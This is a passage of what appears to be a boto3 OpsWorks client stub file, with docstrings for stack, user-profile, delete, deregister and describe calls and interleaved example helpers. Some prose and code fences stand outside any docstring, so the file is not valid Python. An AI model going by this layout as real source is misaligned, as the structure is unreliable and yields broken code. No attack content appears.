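    'EnableAutoHealing': True,
}
# With boto3 configured, the call would then be:
# client = boto3.client('opsworks')
# layer_id = client.create_layer(**layer_params)['LayerId']
```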
"""
pass
def create_stack(Name=None, Region=None, VpcId=None, Attributes=None, ServiceRoleArn=None, DefaultInstanceProfileArn=None, DefaultOs=None, HostnameTheme=None, DefaultAvailabilityZone=None, DefaultSubnetId=None, CustomJson=None, ConfigurationManager=None, ChefConfiguration=None, UseCustomCookbooks=None, UseOpsworksSecurityGroups=None, CustomCookbooksSource=None, DefaultSshKeyName=None, DefaultRootDeviceType=None, AgentVersion=None):
"""
Creates a new stack. For more information, see Create a New Stack .
See also: AWS API Documentation
:example: response = client.create_stack(
Name='string',
Region='string',
VpcId='string',
Attributes={
'string': 'string'
},
ServiceRoleArn='string',
DefaultInstanceProfileArn='string',
DefaultOs='string',
HostnameTheme='string',
DefaultAvailabilityZone='string',
DefaultSubnetId='string',
CustomJson='string',
ConfigurationManager={
'Name': 'string',
'Version': 'string'
},
ChefConfiguration={
'ManageBerkshelf': True|False,
'BerkshelfVersion': 'string'
},
UseCustomCookbooks=True|False,
UseOpsworksSecurityGroups=True|False,
CustomCookbooksSource={
'Type': 'git'|'svn'|'archive'|'s3',
'Url': 'string',
'Username': 'string',
'Password': 'string',
'SshKey': 'string',
'Revision': 'string'
},
DefaultSshKeyName='string',
DefaultRootDeviceType='ebs'|'instance-store',
AgentVersion='string'
)
:type Name: string
:param Name: [REQUIRED]
The stack name.
:type Region: string
:param Region: [REQUIRED]
The stack's AWS region, such as 'ap-south-1'. For more information about Amazon regions, see Regions and Endpoints .
:type VpcId: string
:param VpcId: The ID of the VPC that the stack is to be launched into. The VPC must be in the stack's region. All instances are launched into this VPC. You cannot change the ID later.
If your account supports EC2-Classic, the default value is no VPC .
If your account does not support EC2-Classic, the default value is the default VPC for the specified region.
If the VPC ID corresponds to a default VPC and you have specified either the DefaultAvailabilityZone or the DefaultSubnetId parameter only, AWS OpsWorks Stacks infers the value of the other parameter. If you specify neither parameter, AWS OpsWorks Stacks sets these parameters to the first valid Availability Zone for the specified region and the corresponding default VPC subnet ID, respectively.
If you specify a nondefault VPC ID, note the following:
It must belong to a VPC in your account that is in the specified region.
You must specify a value for DefaultSubnetId .
For more information on how to use AWS OpsWorks Stacks with a VPC, see Running a Stack in a VPC . For more information on default VPC and EC2-Classic, see Supported Platforms .
:type Attributes: dict
:param Attributes: One or more user-defined key-value pairs to be added to the stack attributes.
(string) --
(string) --
:type ServiceRoleArn: string
:param ServiceRoleArn: [REQUIRED]
The stack's AWS Identity and Access Management (IAM) role, which allows AWS OpsWorks Stacks to work with AWS resources on your behalf. You must set this parameter to the Amazon Resource Name (ARN) for an existing IAM role. For more information about IAM ARNs, see Using Identifiers .
:type DefaultInstanceProfileArn: string
:param DefaultInstanceProfileArn: [REQUIRED]
The Amazon Resource Name (ARN) of an IAM profile that is the default profile for all of the stack's EC2 instances. For more information about IAM ARNs, see Using Identifiers .
:type DefaultOs: string
:param DefaultOs: The stack's default operating system, which is installed on every instance unless you specify a different operating system when you create the instance. You can specify one of the following.
A supported Linux operating system: An Amazon Linux version, such as Amazon Linux 2016.09 , Amazon Linux 2016.03 , Amazon Linux 2015.09 , or Amazon Linux 2015.03 .
A supported Ubuntu operating system, such as Ubuntu 16.04 LTS , Ubuntu 14.04 LTS , or Ubuntu 12.04 LTS .
CentOS Linux 7
Red Hat Enterprise Linux 7
A supported Windows operating system, such as Microsoft Windows Server 2012 R2 Base , Microsoft Windows Server 2012 R2 with SQL Server Express , Microsoft Windows Server 2012 R2 with SQL Server Standard , or Microsoft Windows Server 2012 R2 with SQL Server Web .
A custom AMI: Custom . You specify the custom AMI you want to use when you create instances. For more information, see Using Custom AMIs .
The default option is the current Amazon Linux version. For more information on the supported operating systems, see AWS OpsWorks Stacks Operating Systems .
:type HostnameTheme: string
:param HostnameTheme: The stack's host name theme, with spaces replaced by underscores. The theme is used to generate host names for the stack's instances. By default, HostnameTheme is set to Layer_Dependent , which creates host names by appending integers to the layer's short name. The other themes are:
Baked_Goods
Clouds
Europe_Cities
Fruits
Greek_Deities
Legendary_creatures_from_Japan
Planets_and_Moons
Roman_Deities
Scottish_Islands
US_Cities
Wild_Cats
To obtain a generated host name, call GetHostNameSuggestion , which returns a host name based on the current theme.
:type DefaultAvailabilityZone: string
:param DefaultAvailabilityZone: The stack's default Availability Zone, which must be in the specified region. For more information, see Regions and Endpoints . If you also specify a value for DefaultSubnetId , the subnet must be in the same zone. For more information, see the VpcId parameter description.
:type DefaultSubnetId: string
:param DefaultSubnetId: The stack's default VPC subnet ID. This parameter is required if you specify a value for the VpcId parameter. All instances are launched into this subnet unless you specify otherwise when you create the instance. If you also specify a value for DefaultAvailabilityZone , the subnet must be in that zone. For information on default values and when this parameter is required, see the VpcId parameter description.
:type CustomJson: string
:param CustomJson: A string that contains user-defined, custom JSON. It can be used to override the corresponding default stack configuration attribute values or to pass data to recipes. The string should be in the following format:
'{\'key1\': \'value1\', \'key2\': \'value2\',...}'
For more information on custom JSON, see Use Custom JSON to Modify the Stack Configuration Attributes .
:type ConfigurationManager: dict
:param ConfigurationManager: The configuration manager. When you create a stack we recommend that you use the configuration manager to specify the Chef version: 12, 11.10, or 11.4 for Linux stacks, or 12.2 for Windows stacks. The default value for Linux stacks is currently 11.4.
Name (string) --The name. This parameter must be set to 'Chef'.
Version (string) --The Chef version. This parameter must be set to 12, 11.10, or 11.4 for Linux stacks, and to 12.2 for Windows stacks. The default value for Linux stacks is 11.4.
:type ChefConfiguration: dict
:param ChefConfiguration: A ChefConfiguration object that specifies whether to enable Berkshelf and the Berkshelf version on Chef 11.10 stacks. For more information, see Create a New Stack .
ManageBerkshelf (boolean) --Whether to enable Berkshelf.
BerkshelfVersion (string) --The Berkshelf version.
:type UseCustomCookbooks: boolean
:param UseCustomCookbooks: Whether the stack uses custom cookbooks.
:type UseOpsworksSecurityGroups: boolean
:param UseOpsworksSecurityGroups: Whether to associate the AWS OpsWorks Stacks built-in security groups with the stack's layers.
AWS OpsWorks Stacks provides a standard set of built-in security groups, one for each layer, which are associated with layers by default. With UseOpsworksSecurityGroups you can instead provide your own custom security groups. UseOpsworksSecurityGroups has the following settings:
True - AWS OpsWorks Stacks automatically associates the appropriate built-in security group with each layer (default setting). You can associate additional security groups with a layer after you create it, but you cannot delete the built-in security group.
False - AWS OpsWorks Stacks does not associate built-in security groups with layers. You must create appropriate EC2 security groups and associate a security group with each layer that you create. However, you can still manually associate a built-in security group with a layer on creation; custom security groups are required only for those layers that need custom settings.
For more information, see Create a New Stack .
:type CustomCookbooksSource: dict
:param CustomCookbooksSource: Contains the information required to retrieve an app or cookbook from a repository. For more information, see Creating Apps or Custom Recipes and Cookbooks .
Type (string) --The repository type.
Url (string) --The source URL.
Username (string) --This parameter depends on the repository type.
For Amazon S3 bundles, set Username to the appropriate IAM access key ID.
For HTTP bundles, Git repositories, and Subversion repositories, set Username to the user name.
Password (string) --When included in a request, the parameter depends on the repository type.
For Amazon S3 bundles, set Password to the appropriate IAM secret access key.
For HTTP bundles and Subversion repositories, set Password to the password.
For more information on how to safely handle IAM credentials, see http://docs.aws.amazon.com/general/latest/gr/aws-access-keys-best-practices.html .
In responses, AWS OpsWorks Stacks returns *****FILTERED***** instead of the actual value.
SshKey (string) --In requests, the repository's SSH key.
In responses, AWS OpsWorks Stacks returns *****FILTERED***** instead of the actual value.
Revision (string) --The application's version. AWS OpsWorks Stacks enables you to easily deploy new versions of an application. One of the simplest approaches is to have branches or revisions in your repository that represent different versions that can potentially be deployed.
:type DefaultSshKeyName: string
:param DefaultSshKeyName: A default Amazon EC2 key pair name. The default value is none. If you specify a key pair name, AWS OpsWorks installs the public key on the instance and you can use the private key with an SSH client to log in to the instance. For more information, see Using SSH to Communicate with an Instance and Managing SSH Access . You can override this setting by specifying a different key pair, or no key pair, when you create an instance .
:type DefaultRootDeviceType: string
:param DefaultRootDeviceType: The default root device type. This value is the default for all instances in the stack, but you can override it when you create an instance. The default option is instance-store . For more information, see Storage for the Root Device .
:type AgentVersion: string
:param AgentVersion: The default AWS OpsWorks Stacks agent version. You have the following options:
Auto-update - Set this parameter to LATEST . AWS OpsWorks Stacks automatically installs new agent versions on the stack's instances as soon as they are available.
Fixed version - Set this parameter to your preferred agent version. To update the agent version, you must edit the stack configuration and specify a new version. AWS OpsWorks Stacks then automatically installs that version on the stack's instances.
The default setting is the most recent release of the agent. To specify an agent version, you must use the complete version number, not the abbreviated number shown on the console. For a list of available agent version numbers, call DescribeAgentVersions . AgentVersion cannot be set to Chef 12.2.
Note
You can also specify an agent version when you create or update an instance, which overrides the stack's default setting.
:rtype: dict
:return: {
'StackId': 'string'
}
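Since CustomJson must be a JSON-formatted string, one convenient way to build it is json.dumps . The sketch below (the ARNs, VPC/subnet IDs, and S3 URL are placeholders) shows a Chef 12 stack in a VPC with a custom cookbook source:

```python
import json

# Hypothetical sketch: ARNs, VPC/subnet IDs, and the S3 URL are placeholders.
custom_json = json.dumps({'key1': 'value1', 'key2': 'value2'})

stack_params = {
    'Name': 'My Stack',
    'Region': 'ap-south-1',
    'ServiceRoleArn': 'arn:aws:iam::123456789012:role/aws-opsworks-service-role',
    'DefaultInstanceProfileArn': 'arn:aws:iam::123456789012:instance-profile/aws-opsworks-ec2-role',
    'VpcId': 'vpc-00000000',
    'DefaultSubnetId': 'subnet-00000000',   # required when VpcId is specified
    'ConfigurationManager': {'Name': 'Chef', 'Version': '12'},
    'UseCustomCookbooks': True,
    'CustomCookbooksSource': {
        'Type': 's3',
        'Url': 'https://s3.amazonaws.com/example-bucket/cookbooks.tar.gz',
    },
    'CustomJson': custom_json,
}
# With boto3 configured, the call would then be:
# client = boto3.client('opsworks')
# stack_id = client.create_stack(**stack_params)['StackId']
```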
"""
pass
def create_user_profile(IamUserArn=None, SshUsername=None, SshPublicKey=None, AllowSelfManagement=None):
"""
Creates a new user profile.
See also: AWS API Documentation
:example: response = client.create_user_profile(
IamUserArn='string',
SshUsername='string',
SshPublicKey='string',
AllowSelfManagement=True|False
)
:type IamUserArn: string
:param IamUserArn: [REQUIRED]
The user's IAM ARN; this can also be a federated user's ARN.
:type SshUsername: string
:param SshUsername: The user's SSH user name. The allowable characters are [a-z], [A-Z], [0-9], '-', and '_'. If the specified name includes other punctuation marks, AWS OpsWorks Stacks removes them. For example, my.name will be changed to myname . If you do not specify an SSH user name, AWS OpsWorks Stacks generates one from the IAM user name.
:type SshPublicKey: string
:param SshPublicKey: The user's public SSH key.
:type AllowSelfManagement: boolean
:param AllowSelfManagement: Whether users can specify their own SSH public key through the My Settings page. For more information, see Setting an IAM User's Public SSH Key .
:rtype: dict
:return: {
'IamUserArn': 'string'
}
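The SshUsername rule described above (characters other than [a-z], [A-Z], [0-9], '-', and '_' are removed) can be sketched with a simple regex. This is an illustration of the documented behavior, not the service's actual implementation:

```python
import re

def sanitize_ssh_username(name):
    # Keep only [a-z], [A-Z], [0-9], '-', and '_' per the parameter description.
    return re.sub(r'[^A-Za-z0-9_-]', '', name)

# Per the docs, 'my.name' would be changed to 'myname'.
print(sanitize_ssh_username('my.name'))  # myname
```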
"""
pass
def delete_app(AppId=None):
"""
Deletes a specified app.
See also: AWS API Documentation
:example: response = client.delete_app(
AppId='string'
)
:type AppId: string
:param AppId: [REQUIRED]
The app ID.
"""
pass
def delete_instance(InstanceId=None, DeleteElasticIp=None, DeleteVolumes=None):
"""
Deletes a specified instance, which terminates the associated Amazon EC2 instance. You must stop an instance before you can delete it.
For more information, see Deleting Instances .
See also: AWS API Documentation
:example: response = client.delete_instance(
InstanceId='string',
DeleteElasticIp=True|False,
DeleteVolumes=True|False
)
:type InstanceId: string
:param InstanceId: [REQUIRED]
The instance ID.
:type DeleteElasticIp: boolean
:param DeleteElasticIp: Whether to delete the instance Elastic IP address.
:type DeleteVolumes: boolean
:param DeleteVolumes: Whether to delete the instance's Amazon EBS volumes.
"""
pass
def delete_layer(LayerId=None):
"""
Deletes a specified layer. You must first stop and then delete all associated instances or unassign registered instances. For more information, see How to Delete a Layer .
See also: AWS API Documentation
:example: response = client.delete_layer(
LayerId='string'
)
:type LayerId: string
:param LayerId: [REQUIRED]
The layer ID.
"""
pass
def delete_stack(StackId=None):
"""
Deletes a specified stack. You must first delete all instances, layers, and apps or deregister registered instances. For more information, see Shut Down a Stack .
See also: AWS API Documentation
:example: response = client.delete_stack(
StackId='string'
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
"""
pass
def delete_user_profile(IamUserArn=None):
"""
Deletes a user profile.
See also: AWS API Documentation
:example: response = client.delete_user_profile(
IamUserArn='string'
)
:type IamUserArn: string
:param IamUserArn: [REQUIRED]
The user's IAM ARN. This can also be a federated user's ARN.
"""
pass
def deregister_ecs_cluster(EcsClusterArn=None):
"""
Deregisters a specified Amazon ECS cluster from a stack. For more information, see Resource Management .
See also: AWS API Documentation
:example: response = client.deregister_ecs_cluster(
EcsClusterArn='string'
)
:type EcsClusterArn: string
:param EcsClusterArn: [REQUIRED]
The cluster's ARN.
"""
pass
def deregister_elastic_ip(ElasticIp=None):
"""
Deregisters a specified Elastic IP address. The address can then be registered by another stack. For more information, see Resource Management .
See also: AWS API Documentation
:example: response = client.deregister_elastic_ip(
ElasticIp='string'
)
:type ElasticIp: string
:param ElasticIp: [REQUIRED]
The Elastic IP address.
"""
pass
def deregister_instance(InstanceId=None):
"""
Deregisters a registered Amazon EC2 or on-premises instance. This action removes the instance from the stack and returns it to your control. It cannot be used with instances that were created with AWS OpsWorks Stacks.
See also: AWS API Documentation
:example: response = client.deregister_instance(
InstanceId='string'
)
:type InstanceId: string
:param InstanceId: [REQUIRED]
The instance ID.
"""
pass
def deregister_rds_db_instance(RdsDbInstanceArn=None):
"""
Deregisters an Amazon RDS instance.
See also: AWS API Documentation
:example: response = client.deregister_rds_db_instance(
RdsDbInstanceArn='string'
)
:type RdsDbInstanceArn: string
:param RdsDbInstanceArn: [REQUIRED]
The Amazon RDS instance's ARN.
"""
pass
def deregister_volume(VolumeId=None):
"""
Deregisters an Amazon EBS volume. The volume can then be registered by another stack. For more information, see Resource Management.
See also: AWS API Documentation
:example: response = client.deregister_volume(
VolumeId='string'
)
:type VolumeId: string
:param VolumeId: [REQUIRED]
The AWS OpsWorks Stacks volume ID, which is the GUID that AWS OpsWorks Stacks assigned to the instance when you registered the volume with the stack, not the Amazon EC2 volume ID.
"""
pass
def describe_agent_versions(StackId=None, ConfigurationManager=None):
"""
Describes the available AWS OpsWorks Stacks agent versions. You must specify a stack ID or a configuration manager. DescribeAgentVersions returns a list of available agent versions for the specified stack or configuration manager.
See also: AWS API Documentation
:example: response = client.describe_agent_versions(
StackId='string',
ConfigurationManager={
'Name': 'string',
'Version': 'string'
}
)
:type StackId: string
:param StackId: The stack ID.
:type ConfigurationManager: dict
:param ConfigurationManager: The configuration manager.
Name (string) --The name. This parameter must be set to 'Chef'.
Version (string) --The Chef version. This parameter must be set to 12, 11.10, or 11.4 for Linux stacks, and to 12.2 for Windows stacks. The default value for Linux stacks is 11.4.
:rtype: dict
:return: {
'AgentVersions': [
{
'Version': 'string',
'ConfigurationManager': {
'Name': 'string',
'Version': 'string'
}
},
]
}
"""
pass
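The AgentVersions shape documented above is easy to filter client-side. A minimal sketch of a hypothetical helper (the sample response dict and version strings below are illustrative, not real API output):

```python
def agent_versions_for(response, chef_version):
    """Collect agent Version strings whose ConfigurationManager matches chef_version."""
    return [
        av['Version']
        for av in response.get('AgentVersions', [])
        if av.get('ConfigurationManager', {}).get('Version') == chef_version
    ]

# Illustrative response in the documented shape (not real agent versions).
sample = {
    'AgentVersions': [
        {'Version': '4023', 'ConfigurationManager': {'Name': 'Chef', 'Version': '12'}},
        {'Version': '3425', 'ConfigurationManager': {'Name': 'Chef', 'Version': '11.10'}},
    ]
}
print(agent_versions_for(sample, '12'))  # ['4023']
```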
def describe_apps(StackId=None, AppIds=None):
"""
Requests a description of a specified set of apps.
See also: AWS API Documentation
:example: response = client.describe_apps(
StackId='string',
AppIds=[
'string',
]
)
:type StackId: string
:param StackId: The app stack ID. If you use this parameter, DescribeApps returns a description of the apps in the specified stack.
:type AppIds: list
:param AppIds: An array of app IDs for the apps to be described. If you use this parameter, DescribeApps returns a description of the specified apps. Otherwise, it returns a description of every app.
(string) --
:rtype: dict
:return: {
'Apps': [
{
'AppId': 'string',
'StackId': 'string',
'Shortname': 'string',
'Name': 'string',
'Description': 'string',
'DataSources': [
{
'Type': 'string',
'Arn': 'string',
'DatabaseName': 'string'
},
],
'Type': 'aws-flow-ruby'|'java'|'rails'|'php'|'nodejs'|'static'|'other',
'AppSource': {
'Type': 'git'|'svn'|'archive'|'s3',
'Url': 'string',
'Username': 'string',
'Password': 'string',
'SshKey': 'string',
'Revision': 'string'
},
'Domains': [
'string',
],
'EnableSsl': True|False,
'SslConfiguration': {
'Certificate': 'string',
'PrivateKey': 'string',
'Chain': 'string'
},
'Attributes': {
'string': 'string'
},
'CreatedAt': 'string',
'Environment': [
{
'Key': 'string',
'Value': 'string',
'Secure': True|False
},
]
},
]
}
:returns:
For Amazon S3 bundles, set Username to the appropriate IAM access key ID.
For HTTP bundles, Git repositories, and Subversion repositories, set Username to the user name.
"""
pass
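Each App's Environment is returned as a list of Key/Value/Secure records. A sketch of a hypothetical helper that flattens it into a dict while masking Secure values (the sample app below is illustrative):

```python
def app_environment(app, mask='*****'):
    """Flatten an App's Environment list into a dict, masking Secure values."""
    return {
        var['Key']: (mask if var.get('Secure') else var['Value'])
        for var in app.get('Environment', [])
    }

# Illustrative App record in the documented shape.
sample_app = {
    'AppId': 'app-1',
    'Environment': [
        {'Key': 'RAILS_ENV', 'Value': 'production', 'Secure': False},
        {'Key': 'DB_PASSWORD', 'Value': 'hunter2', 'Secure': True},
    ],
}
print(app_environment(sample_app))  # {'RAILS_ENV': 'production', 'DB_PASSWORD': '*****'}
```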
def describe_commands(DeploymentId=None, InstanceId=None, CommandIds=None):
"""
Describes the results of specified commands.
See also: AWS API Documentation
:example: response = client.describe_commands(
DeploymentId='string',
InstanceId='string',
CommandIds=[
'string',
]
)
:type DeploymentId: string
:param DeploymentId: The deployment ID. If you include this parameter, DescribeCommands returns a description of the commands associated with the specified deployment.
:type InstanceId: string
:param InstanceId: The instance ID. If you include this parameter, DescribeCommands returns a description of the commands associated with the specified instance.
:type CommandIds: list
:param CommandIds: An array of command IDs. If you include this parameter, DescribeCommands returns a description of the specified commands. Otherwise, it returns a description of every command.
(string) --
:rtype: dict
:return: {
'Commands': [
{
'CommandId': 'string',
'InstanceId': 'string',
'DeploymentId': 'string',
'CreatedAt': 'string',
'AcknowledgedAt': 'string',
'CompletedAt': 'string',
'Status': 'string',
'ExitCode': 123,
'LogUrl': 'string',
'Type': 'string'
},
]
}
:returns:
failed
successful
skipped
pending
"""
pass
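Command Status takes values such as failed, successful, skipped, and pending, as listed above. A sketch of a hypothetical helper that buckets a DescribeCommands response by status (the sample response is illustrative):

```python
def commands_by_status(response):
    """Group CommandIds from a DescribeCommands-shaped response by their Status."""
    grouped = {}
    for cmd in response.get('Commands', []):
        grouped.setdefault(cmd['Status'], []).append(cmd['CommandId'])
    return grouped

# Illustrative response in the documented shape.
sample = {'Commands': [
    {'CommandId': 'c-1', 'Status': 'successful'},
    {'CommandId': 'c-2', 'Status': 'failed'},
    {'CommandId': 'c-3', 'Status': 'successful'},
]}
print(commands_by_status(sample))  # {'successful': ['c-1', 'c-3'], 'failed': ['c-2']}
```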
def describe_deployments(StackId=None, AppId=None, DeploymentIds=None):
"""
Requests a description of a specified set of deployments.
See also: AWS API Documentation
:example: response = client.describe_deployments(
StackId='string',
AppId='string',
DeploymentIds=[
'string',
]
)
:type StackId: string
:param StackId: The stack ID. If you include this parameter, DescribeDeployments returns a description of the commands associated with the specified stack.
:type AppId: string
:param AppId: The app ID. If you include this parameter, DescribeDeployments returns a description of the commands associated with the specified app.
:type DeploymentIds: list
:param DeploymentIds: An array of deployment IDs to be described. If you include this parameter, DescribeDeployments returns a description of the specified deployments. Otherwise, it returns a description of every deployment.
(string) --
:rtype: dict
:return: {
'Deployments': [
{
'DeploymentId': 'string',
'StackId': 'string',
'AppId': 'string',
'CreatedAt': 'string',
'CompletedAt': 'string',
'Duration': 123,
'IamUserArn': 'string',
'Comment': 'string',
'Command': {
'Name': 'install_dependencies'|'update_dependencies'|'update_custom_cookbooks'|'execute_recipes'|'configure'|'setup'|'deploy'|'rollback'|'start'|'stop'|'restart'|'undeploy',
'Args': {
'string': [
'string',
]
}
},
'Status': 'string',
'CustomJson': 'string',
'InstanceIds': [
'string',
]
},
]
}
:returns:
execute_recipes : Execute one or more recipes. To specify the recipes, set an Args parameter named recipes to the list of recipes to be executed. For example, to execute phpapp::appsetup, set Args to {"recipes":["phpapp::appsetup"]}.
install_dependencies : Install the stack's dependencies.
update_custom_cookbooks : Update the stack's custom cookbooks.
update_dependencies : Update the stack's dependencies.
"""
pass
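The execute_recipes note above implies a Command dict whose Args carries a recipes list. A sketch of building that shape (a hypothetical convenience, not part of the API):

```python
def execute_recipes_command(recipes):
    """Build the Command dict described above for an execute_recipes deployment."""
    return {'Name': 'execute_recipes', 'Args': {'recipes': list(recipes)}}

cmd = execute_recipes_command(['phpapp::appsetup'])
print(cmd)  # {'Name': 'execute_recipes', 'Args': {'recipes': ['phpapp::appsetup']}}
```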
def describe_ecs_clusters(EcsClusterArns=None, StackId=None, NextToken=None, MaxResults=None):
"""
Describes Amazon ECS clusters that are registered with a stack. If you specify only a stack ID, you can use the MaxResults and NextToken parameters to paginate the response. However, AWS OpsWorks Stacks currently supports only one cluster per layer, so the result set has a maximum of one element.
This call accepts only one resource-identifying parameter.
See also: AWS API Documentation
:example: response = client.describe_ecs_clusters(
EcsClusterArns=[
'string',
],
StackId='string',
NextToken='string',
MaxResults=123
)
:type EcsClusterArns: list
:param EcsClusterArns: A list of ARNs, one for each cluster to be described.
(string) --
:type StackId: string
:param StackId: A stack ID. DescribeEcsClusters returns a description of the cluster that is registered with the stack.
:type NextToken: string
:param NextToken: If the previous paginated request did not return all of the remaining results, the response object's NextToken parameter value is set to a token. To retrieve the next set of results, call DescribeEcsClusters again and assign that token to the request object's NextToken parameter. If there are no remaining results, the previous response object's NextToken parameter is set to null .
:type MaxResults: integer
:param MaxResults: To receive a paginated response, use this parameter to specify the maximum number of results to be returned with a single call. If the number of available results exceeds this maximum, the response includes a NextToken value that you can assign to the NextToken request parameter to get the next set of results.
:rtype: dict
:return: {
'EcsClusters': [
{
'EcsClusterArn': 'string',
'EcsClusterName': 'string',
'StackId': 'string',
'RegisteredAt': 'string'
},
],
'NextToken': 'string'
}
"""
pass
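The NextToken/MaxResults description above follows the usual drain-until-no-token pattern. A minimal sketch of a hypothetical pagination driver; `describe` stands in for `client.describe_ecs_clusters`, and the two-page responder below is a fake used only for illustration:

```python
def collect_ecs_clusters(describe, stack_id, max_results=1):
    """Drain a NextToken-paginated DescribeEcsClusters-style call into one list."""
    clusters, token = [], None
    while True:
        kwargs = {'StackId': stack_id, 'MaxResults': max_results}
        if token is not None:
            kwargs['NextToken'] = token
        page = describe(**kwargs)
        clusters.extend(page.get('EcsClusters', []))
        token = page.get('NextToken')
        if token is None:
            return clusters

# Fake two-page responder in the documented shape (real use: client.describe_ecs_clusters).
pages = [
    {'EcsClusters': [{'EcsClusterName': 'a'}], 'NextToken': 't1'},
    {'EcsClusters': [{'EcsClusterName': 'b'}]},
]
fake = lambda **kw: pages[0 if 'NextToken' not in kw else 1]
print([c['EcsClusterName'] for c in collect_ecs_clusters(fake, 'stack-1')])  # ['a', 'b']
```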
def describe_elastic_ips(InstanceId=None, StackId=None, Ips=None):
"""
Describes Elastic IP addresses.
See also: AWS API Documentation
:example: response = client.describe_elastic_ips(
InstanceId='string',
StackId='string',
Ips=[
'string',
]
)
:type InstanceId: string
:param InstanceId: The instance ID. If you include this parameter, DescribeElasticIps returns a description of the Elastic IP addresses associated with the specified instance.
:type StackId: string
:param StackId: A stack ID. If you include this parameter, DescribeElasticIps returns a description of the Elastic IP addresses that are registered with the specified stack.
:type Ips: list
:param Ips: An array of Elastic IP addresses to be described. If you include this parameter, DescribeElasticIps returns a description of the specified Elastic IP addresses. Otherwise, it returns a description of every Elastic IP address.
(string) --
:rtype: dict
:return: {
'ElasticIps': [
{
'Ip': 'string',
'Name': 'string',
'Domain': 'string',
'Region': 'string',
'InstanceId': 'string'
},
]
}
"""
pass
def describe_elastic_load_balancers(StackId=None, LayerIds=None):
"""
Describes a stack's Elastic Load Balancing instances.
See also: AWS API Documentation
:example: response = client.describe_elastic_load_balancers(
StackId='string',
LayerIds=[
'string',
]
)
:type StackId: string
:param StackId: A stack ID. The action describes the stack's Elastic Load Balancing instances.
:type LayerIds: list
:param LayerIds: A list of layer IDs. The action describes the Elastic Load Balancing instances for the specified layers.
(string) --
:rtype: dict
:return: {
'ElasticLoadBalancers': [
{
'ElasticLoadBalancerName': 'string',
'Region': 'string',
'DnsName': 'string',
'StackId': 'string',
'LayerId': 'string',
'VpcId': 'string',
'AvailabilityZones': [
'string',
],
'SubnetIds': [
'string',
],
'Ec2InstanceIds': [
'string',
]
},
]
}
:returns:
(string) --
"""
pass
def describe_instances(StackId=None, LayerId=None, InstanceIds=None):
"""
Requests a description of a set of instances.
See also: AWS API Documentation
:example: response = client.describe_instances(
StackId='string',
LayerId='string',
InstanceIds=[
'string',
]
)
:type StackId: string
:param StackId: A stack ID. If you use this parameter, DescribeInstances returns descriptions of the instances associated with the specified stack.
:type LayerId: string
:param LayerId: A layer ID. If you use this parameter, DescribeInstances returns descriptions of the instances associated with the specified layer.
:type InstanceIds: list
:param InstanceIds: An array of instance IDs to be described. If you use this parameter, DescribeInstances returns a description of the specified instances. Otherwise, it returns a description of every instance.
(string) --
:rtype: dict
:return: {
'Instances': [
{
'AgentVersion': 'string',
'AmiId': 'string',
'Architecture': 'x86_64'|'i386',
'AutoScalingType': 'load'|'timer',
'AvailabilityZone': 'string',
'BlockDeviceMappings': [
{
'DeviceName': 'string',
'NoDevice': 'string',
'VirtualName': 'string',
'Ebs': {
'SnapshotId': 'string',
'Iops': 123,
'VolumeSize': 123,
'VolumeType': 'gp2'|'io1'|'standard',
'DeleteOnTermination': True|False
}
},
],
'CreatedAt': 'string',
'EbsOptimized': True|False,
'Ec2InstanceId': 'string',
'EcsClusterArn': 'string',
'EcsContainerInstanceArn': 'string',
'ElasticIp': 'string',
'Hostname': 'string',
'InfrastructureClass': 'string',
'InstallUpdatesOnBoot': True|False,
'InstanceId': 'string',
'InstanceProfileArn': 'string',
'InstanceType': 'string',
'LastServiceErrorId': 'string',
'LayerIds': [
'string',
],
'Os': 'string',
'Platform': 'string',
'PrivateDns': 'string',
'PrivateIp': 'string',
'PublicDns': 'string',
'PublicIp': 'string',
'RegisteredBy': 'string',
'ReportedAgentVersion': 'string',
'ReportedOs': {
'Family': 'string',
'Name': 'string',
'Version': 'string'
},
'RootDeviceType': 'ebs'|'instance-store',
'RootDeviceVolumeId': 'string',
'SecurityGroupIds': [
'string',
],
'SshHostDsaKeyFingerprint': 'string',
'SshHostRsaKeyFingerprint': 'string',
'SshKeyName': 'string',
'StackId': 'string',
'Status': 'string',
'SubnetId': 'string',
'Tenancy': 'string',
'VirtualizationType': 'paravirtual'|'hvm'
},
]
}
:returns:
(string) --
"""
pass
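Each Instance record above carries both the OpsWorks InstanceId and the underlying Ec2InstanceId. A sketch of a hypothetical helper that indexes a DescribeInstances response by hostname (the sample response is illustrative):

```python
def ec2_ids_by_hostname(response):
    """Map each instance's Hostname to its underlying EC2 instance ID."""
    return {
        inst['Hostname']: inst.get('Ec2InstanceId')
        for inst in response.get('Instances', [])
    }

# Illustrative response in the documented shape.
sample = {'Instances': [
    {'InstanceId': 'op-1', 'Hostname': 'php-app1', 'Ec2InstanceId': 'i-0abc'},
    {'InstanceId': 'op-2', 'Hostname': 'php-app2', 'Ec2InstanceId': 'i-0def'},
]}
print(ec2_ids_by_hostname(sample))  # {'php-app1': 'i-0abc', 'php-app2': 'i-0def'}
```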
def describe_layers(StackId=None, LayerIds=None):
"""
Requests a description of one or more layers in a specified stack.
See also: AWS API Documentation
:example: response = client.describe_layers(
StackId='string',
LayerIds=[
'string',
]
)
:type StackId: string
:param StackId: The stack ID.
:type LayerIds: list
:param LayerIds: An array of layer IDs that specify the layers to be described. If you omit this parameter, DescribeLayers returns a description of every layer in the specified stack.
(string) --
:rtype: dict
:return: {
'Layers': [
{
'StackId': 'string',
'LayerId': 'string',
'Type': 'aws-flow-ruby'|'ecs-cluster'|'java-app'|'lb'|'web'|'php-app'|'rails-app'|'nodejs-app'|'memcached'|'db-master'|'monitoring-master'|'custom',
'Name': 'string',
'Shortname': 'string',
'Attributes': {
'string': 'string'
},
'CloudWatchLogsConfiguration': {
'Enabled': True|False,
'LogStreams': [
{
'LogGroupName': 'string',
'DatetimeFormat': 'string',
'TimeZone': 'LOCAL'|'UTC',
'File': 'string',
'FileFingerprintLines': 'string',
'MultiLineStartPattern': 'string',
'InitialPosition': 'start_of_file'|'end_of_file',
